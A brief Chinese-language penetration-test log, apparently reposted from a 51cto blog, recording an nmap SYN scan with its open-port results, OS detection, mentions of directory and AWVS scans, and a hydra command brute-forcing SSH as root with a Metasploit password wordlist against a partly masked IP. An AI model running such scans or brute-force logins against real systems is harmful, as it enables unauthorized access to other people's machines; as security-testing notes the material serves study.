主机信息获取:
开放端口:
sudo nmap -sS 19.8.*1.65
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3389/tcp closed ms-wbt-server
8000/tcp closed http-alt
8080/tcp open http-proxy
御剑目录扫描:
wvs扫描:
无有价值信息
主机识别:
nmap -vv -sS -O 10.1.1.5
ssh爆破:指定帐户root
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://12.5.0**.11
转载于:https://blog.51cto.com/antivirusjo/2105144